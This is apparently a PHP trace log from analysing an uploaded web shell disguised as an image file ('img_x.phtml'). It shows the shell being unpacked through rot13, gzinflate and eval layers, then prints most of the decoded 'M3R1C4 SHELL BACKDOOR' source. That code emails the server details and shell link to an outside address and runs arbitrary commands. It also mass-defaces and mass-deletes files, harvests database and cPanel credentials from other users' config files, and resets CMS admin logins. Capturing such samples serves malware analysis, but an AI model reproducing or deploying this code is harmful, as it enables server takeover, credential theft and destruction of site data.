2 5 0 0.000726 443600 str_rot13 0 /var/www/html/uploads/img_x.phtml 70 1 '�}�[�����=�3�P5���\022@ܗ��,��*\002��$1\t"�$�U���b�A-L\t\b�3��xt!VH�:Hhꬵc\\j\'��rC���w�֮�elg�W$ѯ�c\\ݐ�1��\003�\025�G\033z�o��\024P���[�0^\024g�M�.\\��`)�\v*Ɋ�x���\034�Yz�\020DZ���G�\004Nl���/�\037�C\036\024xw<���E֓\033ǿ�oU� =U�(U�ŏ��_�S�p�=Hǖ���\023\024P~\030�����2\022$P�����\\��G\031�Z����\032 �3c\016��\025��A��U�(۪y\032�:�\005�V�54F@�Ϻ�)\003�@�2��~���5G\035�*�o\033txx�w\f\auz턣_ �#l�\004����QF\004,&��Ә�(��V:���G��&Yp�fz�ʶ59��\033�ʫ<*��z#]HG~�w�\t�Y���G��!����<Cѵ`�`\bo���'
2 5 1 0.001056 460016
2 5 R '�}�[�����=�3�C5���\022@ܗ��,��*\002��$1\t"�$�H���o�N-Y\t\b�3��kg!IU�:Uuꬵp\\w\'��eP���j�֮�ryt�J$ѯ�p\\ݐ�1��\003�\025�T\033m�b��\024C���[�0^\024t�Z�.\\��`)�\v*Ɋ�k���\034�Lm�\020QM���T�\004Ay���/�\037�P\036\024kj<���R֓\033ǿ�bH� =H�(H�ŏ��_�F�c�=Uǖ���\023\024C~\030�����2\022$C�����\\��T\031�M����\032 �3p\016��\025��N��H�(۪l\032�:�\005�I�54S@�Ϻ�)\003�@�2��~���5T\035�*�b\033gkk�j\f\ahm턣_ �#y�\004����DS\004,&��Ә�(��I:���T��&Lc�sm�ʶ59��\033�ʫ<*��m#]UT~�j�\t�L���T��!����<Pѵ`�`\bb���'
2 6 0 0.001363 439504 gzinflate 0 /var/www/html/uploads/img_x.phtml 70 1 '�}�[�����=�3�C5���\022@ܗ��,��*\002��$1\t"�$�H���o�N-Y\t\b�3��kg!IU�:Uuꬵp\\w\'��eP���j�֮�ryt�J$ѯ�p\\ݐ�1��\003�\025�T\033m�b��\024C���[�0^\024t�Z�.\\��`)�\v*Ɋ�k���\034�Lm�\020QM���T�\004Ay���/�\037�P\036\024kj<���R֓\033ǿ�bH� =H�(H�ŏ��_�F�c�=Uǖ���\023\024C~\030�����2\022$C�����\\��T\031�M����\032 �3p\016��\025��N��H�(۪l\032�:�\005�I�54S@�Ϻ�)\003�@�2��~���5T\035�*�b\033gkk�j\f\ahm턣_ �#y�\004����DS\004,&��Ә�(��I:���T��&Lc�sm�ʶ59��\033�ʫ<*��m#]UT~�j�\t�L���T��!����<Pѵ`�`\bb���'
2 6 1 0.001821 509168
2 6 R '//Z3E1P4 FURYY ONPXQBBE I1.0 \r\n//Qrfvta Ol Abiny - GPN grnz\r\n//Terrmg : VaqbKcybvg & Hfgnqpntr48\r\n//Xrrc Pnyz & Pebbgm!\r\n\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!qbpglcr ugzy>\r\n<ugzy>\r\n<urnq>\r\n<gvgyr>$$ Orol $$</gvgyr>\r\n</urnq>\';\r\n\r\n?>\r\n<?cuc\r\n$xvzr="ndchax21@tznvy.pbz";\r\n$onfyvx="Crfnana Furyy qngnat Phx !";\r\n$fclunpxrem="Qbfln Lbyh : ".$'
2 7 0 0.001990 492752 str_rot13 0 /var/www/html/uploads/img_x.phtml 70 1 '//Z3E1P4 FURYY ONPXQBBE I1.0 \r\n//Qrfvta Ol Abiny - GPN grnz\r\n//Terrmg : VaqbKcybvg & Hfgnqpntr48\r\n//Xrrc Pnyz & Pebbgm!\r\n\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!qbpglcr ugzy>\r\n<ugzy>\r\n<urnq>\r\n<gvgyr>$$ Orol $$</gvgyr>\r\n</urnq>\';\r\n\r\n?>\r\n<?cuc\r\n$xvzr="ndchax21@tznvy.pbz";\r\n$onfyvx="Crfnana Furyy qngnat Phx !";\r\n$fclunpxrem="Qbfln Lbyh : ".$'
2 7 1 0.002185 562416
2 7 R '//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!\r\n\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!doctype html>\r\n<html>\r\n<head>\r\n<title>$$ Beby $$</title>\r\n</head>\';\r\n\r\n?>\r\n<?php\r\n$kime="aqpunk21@gmail.com";\r\n$baslik="Pesanan Shell datang Cuk !";\r\n$spyhackerz="Dosya Yolu : ".$'
2 8 0 0.004137 890592 eval 1 '//M3R1C4 SHELL BACKDOOR V1.0 \r\n//Design By Noval - TCA team\r\n//Greezt : IndoXploit & Ustadcage48\r\n//Keep Calm & Crootz!\r\n\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!doctype html>\r\n<html>\r\n<head>\r\n<title>$$ Beby $$</title>\r\n</head>\';\r\n\r\n?>\r\n<?php\r\n$kime="aqpunk21@gmail.com";\r\n$baslik="Pesanan Shell datang Cuk !";\r\n$spyhackerz="Dosya Yolu : ".$_SERVER[\'DOCUMENT_ROOT\']."\\r\\n";\r\n$spyhackerz.="Server Admin : ".$_SERVER[\'SERVER_ADMIN\']."\\r\\n";\r\n$spyhackerz.="Server isletim sistemi : ".$_SERVER[\'SERVER_SOFTWARE\']."\\r\\n";\r\n$spyhackerz.="Shell Link : http://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\']."\\r\\n";\r\n$spyhackerz.="Avlanan Site : " .$_SERVER[\'HTTP_HOST\']."\\r\\n";\r\nmail($kime, $baslik, $spyhackerz);\r\n?>\r\n<style> \r\n@font-face {\r\n font-family: \'Comic Sans MS\';\r\n font-style: normal;\r\n font-weight: 400;\r\n src: local(\'Comic Sans MS\'), local(\'ComicSansMS\'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format(\'truetype\');\r\n}\r\nbody {\r\n\t\r\n background: black url("data:image/gif;base64,R0lGODlhMgAqAPMLABcXFyYmJjAwMB0dHSAgIBoaGhkZGRQUFCQkJBwcHAAAAP///wAAAAAAAAAAAAAAACH5BAQKAAAAIf4DRzQ0ACH/C05FVFNDQVBFMi4wAwEAAAAsAAAAADIAKgAABP5QyUmrvTjbk44sSCElycR5CoKY3Re6onJK6mQot0LoUynduZQNJ9nteEfgZDVS+FZMZ09Kmz6FQmbJhyXmjNMfsSr+8pDlJQsFiiUCAMksJRjIW4o27I5CCDSAgYKDhIWBNSNcc3oyeHMkE4yPXF1UXkVnSpdNmEljlpVcW1VaVKOcWU2iFFGWmmCbmpawslx+dk5wfHuNKI+6eS+9IwGGxsfIyRiTS1GQuylRc4vCc7WsFFyyUZqvmWOnoK2rtlaqpOeb4tlDQdxj3p45v3F0uG/1c7fQ1DEcygADCswgCc+zYDEKojg4DQ8jWp+4wIIYRBu8MbCgpLOkMZWUVYHpTnWkGAaNyWtpNsFSSKweI5a58jly2GqgzZvGGOJBNKwnT2bQeLr69C7HtnYlj5YM58wUR3OomLJL2aUbUaSolMYMWoffzq498XHFSbasoIMw9UVJu1ManlnfjF7tlFIrSo+npKL7uLEpyJMX3U0gqa5oS14N+4BlqxjXP7PHIgAAIfkEBQoACwAsAQABADAAKAAABP4wJUURUivrvdRJXChuikRNlHJRhmKErguXo3imajqBXEn3v1rGR6ykWq8ecsYTakoBgLN3mFqv2Kx2y918DpQCokD5VlYKMdmTALPdltSXtBQaYXVSjiV77mA7KReAQU97Pk0deSN3Sn16aEgJUWVtYWOVcAIDl2tmbxWbXaOkpVcqaHMhYllncpYlKJGPTwQYWIK3erI6hUODuI27RnxJJLatwoYTCJtlpiTNnG/Q1dbXCxMiJpknKGljrS03TLrLKbYErd/aQO3DRgjiveXlFOlZsJNTHtj+/wBXheuhxtsrNwXmGbNyoxgec4QS8Svyp8c7G4smfsuoCCIVWD4FoQDodIIStYAoU17BBCpWipAftLRUg8+dxxgLh/h4OC7dBXk2I9azSORnzWE8h9KhFeLTpJHgPEl00i1qBAAh+QQFCgALACwBAAEAMAAoAAAE/rCgsqq9OOudEVIEqCgGOSqJko3fSnCa8n1oPaarrGI6zIchU+m2u7CKFpBvyWw6n9CodErFHBKHW2okKWhP16zMd1yVhrXcVnhCwMq81BrHs9XWbg7ceD7RjXZ9e08KVxtdNwEAI2EsVY+QkU2NhVgsNJUxiCh/ZIKCOiNnLiJEoiR6ckR4figrM62rep8mR6cGpEGBJAkBMZSUCAIDjAmSx8jJVV1LCcZSQrlmta7Qcq9jcXadS6WjP0o8oM/K5ebn6BdrhiuUmx5Ib3a7uOKodS1MpvvX2uRJPfTNW/ONzz1A+ZR5qSTmnYB0ECNWKCbGWbwFMjBRskgozLiLIIMm0tNnQBWRHAkBzqlmBNadjyhBjnRiCYUiFsPMhYkAACH5BAUKAAsALAEAAQAwACgAAAT+MCW1ql0F3c2XUlonftOnlAqRcorRsiAlbqR5mgjITgmcz7SbCaUisFwGH3DJbDqf0Kh02vwcEodPpvBB/JhYEmqrRXAV14OLWmm5a5/iscVj31CoXOhyX9uRQyZyNEhpZWcIAmwdW4uOj5CRCgVVXjJObzcsRYE+JoBdQDUsep1BOTV5opo0nKOnn5l6UFmTj4mRubq7OyhpUDpUr3wqTF2XlaZ8s6tfmCrDFinIIzG8T3vX2tsbYWjehiDZ0uHhllZYfH7N1B6goDEfSHwTxtY0PKk4gT3S6zPH5rhwMzAewUQD0NUq5w0XC4a1EFrhRrGixYsYM+5KQQaEoosDZiIAADs=");\r\nline-height: 1;color: #fff;font-family: Comic Sans MS ;\r\n \r\n }\r\n \r\ntable, th, td {\r\n\tborder-collapse:collapse;\r\n\tbackground: transparent;\r\n\tfont-family: Comic Sans MS ;\r\n\tfont-size: 13px;\r\n}\r\ninput, textarea { font-family: Comic Sans MS ; }\r\n.table_home, .th_home, .td_home { color:grey;\r\n\tborder: 1px solid grey;\r\n}\r\nth {\r\n\tpadding: 10px;\r\n}\r\n.td_home { padding: 7px; }\r\nselect {font-family: Comic Sans MS }\r\na {color:white}\r\ntextarea { width: 100%;height: 400px; }\r\n</style>\r\n<?php\r\n\r\necho \'</head>\r\n<body><b>\r\n<H1><center>M3R1C4 <font color="red">SHELL BACKDOOR</font> <font color="dodgerblue">V1.0</font></center></h1>\r\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n\r\n<tr><td>\r\n\r\n<font color="green"><center>\'.php_uname().\'</center></font><br>\';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = \r\ngetcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<font color=#fff><center>Current DIR:<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho "<hr>";\r\necho "<right>";\r\necho "<ul>";\r\necho "<li><a href=\'?\'>Home</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cmd\'>Command</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=mass_deface\'>Mass Deface</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=mass_delete\'>Mass Delete</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=config\'>Config</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=jumping\'>Jumping</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cpanel\'>CPanel Crack</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=smtp\'>SMTP Grabber</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=zoneh\'>Zone-H</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cgi\'>CGI Telnet</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=network\'>network</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=adminer\'>Adminer</a></li><br>";\r\necho "<li><a href=\'?dir=$dir&do=fake_root\'>Fake Root</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_edit_user\'>Auto Edit User</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_wp\'>Auto Edit Title WordPress</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_dwp\'>WordPress Auto Deface</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=auto_dwp2\'>WordPress Auto Deface V.2</a></li>";\r\necho "<li><a href=\'?dir=$dir&do=cpftp_auto\'>CPanel/FTP Auto Deface</a></li>";\r\necho "</ul>";\r\necho "</right>";\r\necho "<hr>";\r\nif($_GET[\'do\'] == \'upload\') {\r\n\techo "<center>";\r\n\tif($_POST[\'upload\']) {\r\n\t\tif(@copy($_FILES[\'ix_file\'][\'tmp_name\'], "$dir/".$_FILES[\'ix_file\'][\'name\']."")) {\r\n\t\t\t$act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES[\'ix_file\'][\'name\']."</b></i>";\r\n\t\t} else {\r\n\t\t\t$act = "<font color=red>failed to upload file</font>";\r\n\t\t}\r\n\t}\r\n\techo "Upload File: [ ".w($dir,"Writeable")." ]<form method=\'post\' enctype=\'multipart/form-data\'><input type=\'file\' name=\'ix_file\'><input type=\'submit\' value=\'upload\' name=\'upload\'></form>";\r\n\techo $act;\r\n\techo "</center>";\r\n} elseif($_GET[\'do\'] == \'cmd\') {\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>".$user."@".gethostbyname($_SERVER[\'HTTP_HOST\']).":~# </font>\r\n\t<input type=\'text\' size=\'30\' height=\'10\' name=\'cmd\'><input type=\'submit\' name=\'do_cmd\' value=\'>>\'>\r\n\t</form>";\r\n\tif($_POST[\'do_cmd\']) {\r\n\t\techo "<pre>".exe($_POST[\'cmd\'])."</pre>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_deface\') {\r\n\tfunction sabun_massal($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t\t$idx = sabun_massal($dirc,$namafile,$isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tfunction sabun_biasa($dir,$namafile,$isi_script) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\techo "[<font color=lime>DONE</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\tfile_put_contents($lokasi, $isi_script);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\tif($_POST[\'tipe_sabun\'] == \'mahal\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_massal($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t} elseif($_POST[\'tipe_sabun\'] == \'murah\') {\r\n\t\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\t\tsabun_biasa($_POST[\'d_dir\'], $_POST[\'d_file\'], $_POST[\'script\']);\r\n\t\t\techo "</div>";\r\n\t\t}\r\n\t} else {\r\n\techo "<center>";\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>Tipe Sabun:</font><br>\r\n\t<input type=\'radio\' name=\'tipe_sabun\' value=\'murah\' checked>Biasa<input type=\'radio\' name=\'tipe_sabun\' value=\'mahal\'>Massal<br>\r\n\t<font style=\'text-decoration: underline;\'>Folder:</font><br>\r\n\t<input type=\'text\' name=\'d_dir\' value=\'$dir\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Filename:</font><br>\r\n\t<input type=\'text\' name=\'d_file\' value=\'index.php\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Index File:</font><br>\r\n\t<textarea name=\'script\' style=\'width: 450px; height: 200px;\'>Hacked by </textarea><br>\r\n\t<input type=\'submit\' name=\'start\' value=\'Mass Deface\' style=\'width: 100px;\'>\r\n\t</form></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'mass_delete\') {\r\n\tfunction hapus_massal($dir,$namafile) {\r\n\t\tif(is_writable($dir)) {\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\t$dirc = "$dir/$dirb";\r\n\t\t\t\t$lokasi = $dirc.\'/\'.$namafile;\r\n\t\t\t\tif($dirb === \'.\') {\r\n\t\t\t\t\tif(file_exists("$dir/$namafile")) {\r\n\t\t\t\t\t\tunlink("$dir/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif($dirb === \'..\') {\r\n\t\t\t\t\tif(file_exists("".dirname($dir)."/$namafile")) {\r\n\t\t\t\t\t\tunlink("".dirname($dir)."/$namafile");\r\n\t\t\t\t\t}\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(is_dir($dirc)) {\r\n\t\t\t\t\t\tif(is_writable($dirc)) {\r\n\t\t\t\t\t\t\tif(file_exists($lokasi)) {\r\n\t\t\t\t\t\t\t\techo "[<font color=lime>DELETED</font>] $lokasi<br>";\r\n\t\t\t\t\t\t\t\tunlink($lokasi);\r\n\t\t\t\t\t\t\t\t$idx = hapus_massal($dirc,$namafile);\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($_POST[\'start\']) {\r\n\t\techo "<div style=\'margin: 5px auto; padding: 5px\'>";\r\n\t\thapus_massal($_POST[\'d_dir\'], $_POST[\'d_file\']);\r\n\t\techo "</div>";\r\n\t} else {\r\n\techo "<center>";\r\n\techo "<form method=\'post\'>\r\n\t<font style=\'text-decoration: underline;\'>Folder:</font><br>\r\n\t<input type=\'text\' name=\'d_dir\' value=\'$dir\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<font style=\'text-decoration: underline;\'>Filename:</font><br>\r\n\t<input type=\'text\' name=\'d_file\' value=\'index.php\' style=\'width: 450px;\' height=\'10\'><br>\r\n\t<input type=\'submit\' name=\'start\' value=\'Mass Delete\' style=\'width: 100px;\'>\r\n\t</form></center>";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'config\') {\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\t$idx = mkdir("idx_config", 0777);\r\n\t$isi_htc = "Options all\\nRequire None\\nSatisfy Any";\r\n\t$htc = fopen("idx_config/.htaccess","w");\r\n\tfwrite($htc, $isi_htc);\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == "" || !$etc) {\r\n\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_config);\r\n\t\t\tforeach($user_config[1] as $user_idx) {\r\n\t\t\t\t$user_config_dir = "/home/$user_idx/public_html/";\r\n\t\t\t\tif(is_readable($user_config_dir)) {\r\n\t\t\t\t\t$grab_config = array(\r\n\t\t\t\t\t\t"/home/$user_idx/.my.cnf" => "cpanel",\r\n\t\t\t\t\t\t"/home/$user_idx/.accesshash" => "WHM-accesshash",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/vdo_config.php" => "Voodoo",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/forum/config.php" => "phpBB",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/configuration.php" => "Joomla",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/wp-config.php" => "WordPress",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/admin/config.php" => "OpenCart",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/slconfig.php" => "Sitelok",\r\n\t\t\t\t\t\t"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");\r\n\t\t\t\t\tforeach($grab_config as $config => $nama_config) {\r\n\t\t\t\t\t\t$ambil_config = file_get_contents($config);\r\n\t\t\t\t\t\tif($ambil_config == \'\') {\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");\r\n\t\t\t\t\t\t\tfputs($file_config,$ambil_config);\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\t\t\r\n\t\t\t}\r\n\t\t}\t\r\n\t}\r\n\techo "<center><a href=\'?dir=$dir/idx_config\'><font color=lime>Done</font></a></center>";\r\n} elseif($_GET[\'do\'] == \'jumping\') {\r\n\t$i = 0;\r\n\techo "<pre><div class=\'margin: 5px auto;\'>";\r\n\t$etc = fopen("/etc/passwd", "r");\r\n\twhile($passwd = fgets($etc)) {\r\n\t\tif($passwd == \'\' || !$etc) {\r\n\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t} else {\r\n\t\t\tpreg_match_all(\'/(.*?):x:/\', $passwd, $user_jumping);\r\n\t\t\tforeach($user_jumping[1] as $user_idx_jump) {\r\n\t\t\t\t$user_jumping_dir = "/home/$user_idx_jump/public_html";\r\n\t\t\t\tif(is_readable($user_jumping_dir)) {\r\n\t\t\t\t\t$i++;\r\n\t\t\t\t\t$jrw = "[<font color=lime>R</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\tif(is_writable($user_jumping_dir)) {\r\n\t\t\t\t\t\t$jrw = "[<font color=lime>RW</font>] <a href=\'?dir=$user_jumping_dir\'><font color=gold>$user_jumping_dir</font></a>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\techo $jrw;\r\n\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t$domain_jump = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\tif($domain_jump == \'\') {\r\n\t\t\t\t\t\t\techo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);\r\n\t\t\t\t\t\t\tforeach($domains_jump[1] as $dj) {\r\n\t\t\t\t\t\t\t\t$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t$user_jumping_url = $user_jumping_url[\'name\'];\r\n\t\t\t\t\t\t\t\tif($user_jumping_url == $user_idx_jump) {\r\n\t\t\t\t\t\t\t\t\techo " => ( <u>$dj</u> )<br>";\r\n\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif($i == 0) { \r\n\t} else {\r\n\t\techo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER[\'HTTP_HOST\'])."";\r\n\t}\r\n\techo "</div></pre>";\r\n} elseif($_GET[\'do\'] == \'auto_edit_user\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\tif(strlen($_POST[\'pass_baru\']) < 6 OR strlen($_POST[\'user_baru\']) < 6) {\r\n\t\t\techo "username atau password harus lebih dari 6 karakter";\r\n\t\t} else {\r\n\t\t\t$user_baru = $_POST[\'user_baru\'];\r\n\t\t\t$pass_baru = md5($_POST[\'pass_baru\']);\r\n\t\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t\t$scan_conf = scandir($conf);\r\n\t\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\t\tif(preg_match("/JConfig|joomla/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"host = \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"user = \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"password = \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"db = \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"dbprefix = \'","\'");\r\n\t\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t\t$id = $result[\'id\'];\r\n\t\t\t\t\t$site = ambilkata($config,"sitename = \'","\'");\r\n\t\t\t\t\t$update = mysql_query("UPDATE $prefix SET username=\'$user_baru\',password=\'$pass_baru\' WHERE id=\'$id\'");\r\n\t\t\t\t\techo "Config => ".$file_conf."<br>";\r\n\t\t\t\t\techo "CMS => Joomla<br>";\r\n\t\t\t\t\tif($site == \'\') {\r\n\t\t\t\t\t\techo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Sitename => $site<br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\t\techo "Status => <font color=red>".mysql_error()."</font><br><br>";\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\techo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";\r\n\t\t\t\t\t}\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} elseif(preg_match("/WordPress/",$config)) {\r\n\t\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = 